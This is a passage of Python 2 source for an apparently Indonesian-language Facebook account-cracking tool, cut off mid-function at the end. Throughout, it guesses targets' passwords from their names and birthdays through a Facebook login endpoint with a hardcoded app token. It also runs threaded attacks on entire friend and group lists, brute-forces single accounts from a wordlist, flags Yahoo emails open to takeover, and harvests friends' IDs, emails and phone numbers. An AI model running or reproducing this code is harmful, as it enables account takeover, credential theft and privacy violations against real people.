hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if hack == '': print '\x1b[1;91m[!] Jangan kosong' hack_pilih() else: if hack == '1': mini() else: if hack == '2': crack() hasil() else: if hack == '3': super() else: if hack == '4': brute() else: if hack == '5': menu_yahoo() else: if hack == '6': grab() else: if hack == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada' hack_pilih() def mini(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !' try: id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) a = json.loads(r.text) print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' pz1 = a['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: pz2 = a['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: pz3 = a['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: lahir = a['birthday'] pz4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: print '\x1b[1;91m[!] Maaf, gagal membuka password target :(' print '\x1b[1;91m[!] Cobalah dengan cara lain.' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() except KeyError: print '\x1b[1;91m[!] Terget tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() def crack(): global file global idlist global passw os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] File tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Koneksi terganggu' time.sleep(1) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' def hasil(): print print 40 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal)) keluar() def super(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Crack dari daftar Teman' print '\x1b[1;37;40m2. Crack dari member Grup' print '\x1b[1;31;40m0. Kembali' print pilih_super() def pilih_super(): peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Jangan kosong' pilih_super() else: if peak == '1': os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') titik = ['. ', '.. ', '... '] for o in titik: print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) print print 40 * '\x1b[1;97m\xe2\x95\x90' def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1 else: pass2 = b['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2 else: pass3 = b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3 else: lahir = b['birthday'] pass4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4 except: pass p = ThreadPool(30) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() def brute(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' try: email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m') total = open(passw, 'r') total = total.readlines() print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') sandi = open(passw, 'r') for pw in sandi: try: pw = pw.replace('\n', '') sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw) sys.stdout.flush() data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') mpsh = json.loads(data.text) if 'access_token' in mpsh: dapat = open('Brute.txt', 'w') dapat.write(email + ' | ' + pw + '\n') dapat.close() print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() else: if 'www.facebook.com' in mpsh['error_msg']: ceks = open('Brutecekpoint.txt', 'w') ceks.write(email + ' | ' + pw + '\n') ceks.close() print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Koneksi Error' time.sleep(1) except IOError: print '\x1b[1;91m[!] File tidak ditemukan...' print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist' tanyaw() def tanyaw(): why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ') if why == '': print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)' tanyaw() else: if why == 'y': wordlist() else: if why == 'Y': wordlist() else: if why == 't': menu_hack() else: if why == 'T': menu_hack() else: print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)' tanyaw() def menu_yahoo(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Dari teman facebook' print '\x1b[1;37;40m2. Gunakan File' print '\x1b[1;31;40m0. Kembali' print yahoo_pilih() def yahoo_pilih(): go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if go == '': print '\x1b[1;91m[!] Jangan kosong' yahoo_pilih() else: if go == '1': yahoofriends() else: if go == '2': yahoolist() else: if go == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada' yahoo_pilih() def yahoofriends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) kimak = json.loads(teman.text) save = open('MailVuln.txt', 'w') print 40 * '\x1b[1;97m\xe2\x95\x90' for w in kimak['data']: jml += 1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]' print 40 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' except KeyError: pass print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def yahoolist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m') try: total = open(files, 'r') mail = total.readlines() except IOError: print '\x1b[1;91m[!] File tidak ada' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') save = open('MailVuln.txt', 'w') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]' print mail = open(files, 'r').readlines() for pw in mail: mail = pw.replace('\n', '') jml += 1 mpsh.append(jml) yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m ' + mail continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print '\x1b[1;92m ' + mail else: print '\x1b[1;91m ' + mail print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def grab(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Ambil ID teman' print '\x1b[1;37;40m2. Ambil ID teman dari teman' print '\x1b[1;37;40m3. Ambil ID member GRUP' print '\x1b[1;37;40m4. Ambil Email teman' print '\x1b[1;37;40m5. Ambil Email teman dari teman' print '\x1b[1;37;40m6. Ambil No HP teman' print '\x1b[1;37;40m7. Ambil No HP teman dari teman' print '\x1b[1;31;40m0. Kembali' print grab_pilih() def grab_pilih(): cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Jangan kosong' grab_pilih() else: if cuih == '1': id_teman() else: if cuih == '2': idfrom_teman() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_teman() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_teman() else: if cuih == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada' grab_pilih() def id_teman(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idteman.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def idfrom_teman(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromteman.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def id_member_grup(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token 